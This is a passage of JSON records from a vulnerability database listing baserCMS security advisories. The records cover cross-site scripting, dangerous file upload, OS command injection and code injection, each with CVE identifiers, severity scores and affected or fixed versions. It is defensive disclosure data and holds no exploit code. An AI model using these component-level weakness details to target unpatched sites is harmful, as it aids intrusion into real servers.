ulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9"}],"aliases":["CVE-2023-51450","GHSA-77fc-4cv5-hmfr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uedz-j2vn-cbea"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/52932?format=json","vulnerability_id":"VCID-vqx2-hzju-r7et","summary":"Cross-site Scripting\nbaserCMS is affected by Cross Site Scripting (XSS) via arbitrary script execution. Admin access is required to exploit this vulnerability. The affected components is `toolbar.php`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15155","reference_id":"","reference_type":"","scores":[{"value":"0.00868","scoring_system":"epss","scoring_elements":"0.75527","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00868","scoring_system":"epss","scoring_elements":"0.75555","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15155"},{"reference_url":"https://basercms.net/security/20200827","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/20200827"},{"reference_url":"https://github.com/baserproject/basercms/commit/94cbfab74c9fd6d04492597a1a684674c3c0e30f","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/94cbfab74c9fd6d04492597a1a684674c3c0e30f"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-4r3m-j6x5-48m3","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-4r3m-j6x5-48m3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15155","reference_id":"CVE-2020-15155","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15155"},{"reference_url":"https://github.com/advisories/GHSA-4r3m-j6x5-48m3","reference_id":"GHSA-4r3m-j6x5-48m3","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4r3m-j6x5-48m3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/77910?format=json","purl":"pkg:composer/baserproject/basercms@4.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.3.7"}],"aliases":["CVE-2020-15155","GHSA-4r3m-j6x5-48m3"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vqx2-hzju-r7et"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53748?format=json","vulnerability_id":"VCID-wvnk-63hy-ykeq","summary":"Cross-site Scripting\nbaserCMS is vulnerable to Cross-Site Scripting. Arbitrary JavaScript may be executed by entering a specially crafted nickname in the blog comments. The issue affects the blog comment component.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15276","reference_id":"","reference_type":"","scores":[{"value":"0.00592","scoring_system":"epss","scoring_elements":"0.69606","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00592","scoring_system":"epss","scoring_elements":"0.69646","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15276"},{"reference_url":"https://basercms.net/security/20201029","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/20201029"},{"reference_url":"https://github.com/baserproject/basercms/commit/d14f506385f21d67d5ff3462f204d4c2321b7c54","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/d14f506385f21d67d5ff3462f204d4c2321b7c54"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-fw5q-j9p4-3vxg","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-fw5q-j9p4-3vxg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15276","reference_id":"CVE-2020-15276","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15276"},{"reference_url":"https://github.com/advisories/GHSA-fw5q-j9p4-3vxg","reference_id":"GHSA-fw5q-j9p4-3vxg","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fw5q-j9p4-3vxg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/79034?format=json","purl":"pkg:composer/baserproject/basercms@4.4.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.1"}],"aliases":["CVE-2020-15276","GHSA-fw5q-j9p4-3vxg"],"risk_score":3.5,"exploitability":"0.5","weighted_severity":"6.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wvnk-63hy-ykeq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/54254?format=json","vulnerability_id":"VCID-xpsb-2yux-g3cf","summary":"Cross-site Scripting\nImproper neutralization of JavaScript input in the blog article editing function of baserCMS allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-20683","reference_id":"","reference_type":"","scores":[{"value":"0.00203","scoring_system":"epss","scoring_elements":"0.42402","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00203","scoring_system":"epss","scoring_elements":"0.42327","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-20683"},{"reference_url":"https://basercms.net/security/JVN64869876","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN64869876"},{"reference_url":"https://github.com/baserproject/basercms/commit/88ccc61e5656b05dd13204d61de706efaa2cd0b1","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/88ccc61e5656b05dd13204d61de706efaa2cd0b1"},{"reference_url":"https://jvn.jp/en/jp/JVN64869876/index.html","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://jvn.jp/en/jp/JVN64869876/index.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20683","reference_id":"CVE-2021-20683","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20683"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/80118?format=json","purl":"pkg:composer/baserproject/basercms@4.4.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5"}],"aliases":["CVE-2021-20683","GHSA-v9w8-hq92-v39m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xpsb-2yux-g3cf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53746?format=json","vulnerability_id":"VCID-xxud-7jsh-bbc1","summary":"Unrestricted Upload of File with Dangerous Type\nbaserCMS Code may be executed by logging in as a system administrator and uploading an executable script file such as a PHP file. The `Edit template` component was found to be vulnerable.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15277","reference_id":"","reference_type":"","scores":[{"value":"0.03225","scoring_system":"epss","scoring_elements":"0.87299","published_at":"2026-06-04T12:55:00Z"},{"value":"0.03225","scoring_system":"epss","scoring_elements":"0.87321","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15277"},{"reference_url":"https://basercms.net/security/20201029","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/20201029"},{"reference_url":"https://github.com/baserproject/basercms/commit/bb027c3967b0430adcff2d2fedbc23d39077563b","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/bb027c3967b0430adcff2d2fedbc23d39077563b"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-6fmv-q269-55cw","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-6fmv-q269-55cw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15277","reference_id":"CVE-2020-15277","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15277"},{"reference_url":"https://github.com/advisories/GHSA-6fmv-q269-55cw","reference_id":"GHSA-6fmv-q269-55cw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6fmv-q269-55cw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/79034?format=json","purl":"pkg:composer/baserproject/basercms@4.4.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.1"}],"aliases":["CVE-2020-15277","GHSA-6fmv-q269-55cw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xxud-7jsh-bbc1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90946?format=json","vulnerability_id":"VCID-y2sz-c6vb-pkdp","summary":"baserCMS Update Functionality Vulnerable to OS Command Injection\n### Summary\nThe latest version of baserCMS (basercms-5.2.2) contains an OS command injection vulnerability (CWE-78) in its update functionality.\nDue to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS.\n\n### Details\nPlease refer to the attached materials.\n[OSコマンドインジェクション(baserCMSのアップデート機能).pdf](https://github.com/user-attachments/files/25468689/OS.baserCMS.pdf)\n\n\n\n### Impact\nAn authenticated user with administrator privileges in baserCMS can execute OS commands on the server with the privileges of the user account running baserCMS.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30877","reference_id":"","reference_type":"","scores":[{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.19955","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30877"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30877","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30877"},{"reference_url":"https://github.com/advisories/GHSA-m9g7-rgfc-jcm7","reference_id":"GHSA-m9g7-rgfc-jcm7","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-m9g7-rgfc-jcm7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2026-30877","GHSA-m9g7-rgfc-jcm7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y2sz-c6vb-pkdp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38780?format=json","vulnerability_id":"VCID-y9f3-k7xk-rucf","summary":"Code Injection\nbaserCMS allows an attacker to execute arbitrary PHP code on the server via unspecified vectors.","references":[{"reference_url":"http://jvn.jp/en/jp/JVN78151490/index.html","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://jvn.jp/en/jp/JVN78151490/index.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-10844","reference_id":"","reference_type":"","scores":[{"value":"0.00568","scoring_system":"epss","scoring_elements":"0.6893","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00568","scoring_system":"epss","scoring_elements":"0.68891","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-10844"},{"reference_url":"https://basercms.net/security/JVN78151490","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN78151490"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-10844","reference_id":"CVE-2017-10844","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-10844"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/212595?format=json","purl":"pkg:composer/baserproject/basercms@4.0.5.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-2u6y-aj6t-7fb1"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-6trr-5deb-yydm"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-9mf7-56fh-fyfk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-d5gk-q2hh-kba5"},{"vulnerability":"VCID-e4xa-jm9u-nked"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ga9u-uv9b-tydr"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-gsg3-fdmu-vqag"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-p6nr-eu91-53b4"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-r4jc-22rq-d3cb"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-vqx2-hzju-r7et"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-yesf-qxgy-3ygx"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zy68-bur9-1fck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.5.1"},{"url":"http://public2.vulnerablecode.io/api/packages/54021?format=json","purl":"pkg:composer/baserproject/basercms@4.0.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-2u6y-aj6t-7fb1"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-6trr-5deb-yydm"},{"